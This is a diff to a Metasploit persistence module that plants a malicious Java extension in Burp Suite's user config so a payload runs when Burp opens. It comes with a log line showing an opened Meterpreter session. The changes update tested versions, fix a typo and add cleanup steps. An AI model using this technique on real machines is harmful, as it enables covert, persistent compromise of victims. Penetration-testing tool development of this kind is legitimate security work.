[*] Meterpreter session 2 opened (1.1.1.1:9817 -> 3.3.3.3:52712) at 2026-01-16 07:55:28 -0500
```
modules/exploits/multi/persistence/burp_extension.rb
+5 -4
View File
@@ -25,9 +25,8 @@ class MetasploitModule < Msf::Exploit::Local
This module adds a java based malicious extension to the Burp Suite configuration file.
When burp is opened, the extension will be loaded and the payload will be executed.
Tested against Burp Suite Community Edition v2024.9.4, v2024.10.3 on Kali.
Tested against Burp Suite Professional ??? on Kali.
Tested against Burp Suite Community Edition v2024.10.3 on Windows 10.
Tested against Burp Suite Community Edition v2024.9.4, on Ubuntu Desktop 24.04.
Tested against Burp Suite Community Edition v2025.12.3 on Windows 10.
},
'License' => MSF_LICENSE,
'Author' => [
@@ -162,6 +161,7 @@ class MetasploitModule < Msf::Exploit::Local
user_config_json['user_options']['extender']['extensions'] = extensions_config
fail_with Failure::PayloadFailed, 'Module failed to overwrite UserConfig file' unless write_file(@userconfig_path, JSON.generate(user_config_json))
@clean_up_rc << "upload #{path} #{@userconfig_path}\n"
end
def check
@@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Local
def run_local_gradle_build(extension_name)
# Check if gradle is installed
fails_with(Failure::NotFound, 'Gradle is not installed on the local system.') unless File.exist?(datastore['GRADLE'])
fail_with(Failure::NotFound, 'Gradle is not installed on the local system.') unless File.exist?(datastore['GRADLE'])
# Define source and destination directories
src_dir = File.join(Msf::Config.data_directory, 'exploits', 'burp_extension')
@@ -321,6 +321,7 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status("Writing malicious extension to disk: #{extension_location}")
fail_with Failure::PayloadFailed, 'Failed to write malicious extension' unless write_file(extension_location, jar)
@clean_up_rc << "rm #{extension_location}\n"
# overwrite configuration
vprint_status('Modifying Burp configuration and adding malicious extension')
modify_user_config(extension_location, extension_name)